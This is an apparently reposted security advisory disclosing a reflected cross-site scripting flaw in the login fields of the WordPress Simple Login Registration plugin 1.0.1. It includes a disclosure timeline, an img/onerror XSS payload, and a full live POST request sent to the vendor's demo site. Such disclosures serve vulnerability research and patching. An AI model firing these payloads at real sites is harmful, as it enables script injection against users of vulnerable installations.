WordPress Simple Login Registration 1.0.1 Cross Site Scripting

2013.08.27
Credit: Dylan Irzi
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

########################################################################################### # Exploit Title: Cross Site Scripting WP Simple Login Registration 1.0.1 - Wordpress # Date: 26 de Agosto del 2013 # Exploit Author: Dylan Irzi # Credit goes for: websecuritydev.com # Vendor Homepage: http://envato.dropntheme.com/wp-simple-login-registration-plugin/ # Tested on: Win8 & Linux Mint # Affected Version : 1.01 y Posteriores. ########################################################################################### Timeline: - 20 De agosto XSS Encontrado y Reportado. - 25 De Agosto Vendedor responde que la vulnerabilidad es por PHP.INI - 26 De Agosto Diclosure!! ------------------------------------------------------------------------------------------ Campos de Login Son Vulnerables a Cross Site Scripting Reflected Via Post. <input id="username" class="text-input" type="text" value="Vector XSS" name="username"> <input type="password" class="text-input" id="password" name="password"> Vector: ""><img src=x onerror=prompt(/XSS/);>> Example: http://envato.dropntheme.com/wp-simple-login-registration-plugin/live-demo/login/ http Live Request. ------------------------------------------------------------------------------------------ Host: envato.dropntheme.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 AlexaToolbar/alxf-2.18 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://envato.dropntheme.com/wp-simple-login-registration-plugin/live-demo/login/ Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 252 POST: username=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&password=&remember-me=forever&submit=Log+in&login_nonce_field=a72b0d3cb6&_wp_http_referer=%2Fwp-simple-login-registration-plugin%2Flive-demo%2Flogin%2F&wpslrp_action=ddsfeu_login ------------------------------------------------------------------------------------------ *By Dylan Irzi @Dylan_Irzi11 Pentest de Seguridad.*


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top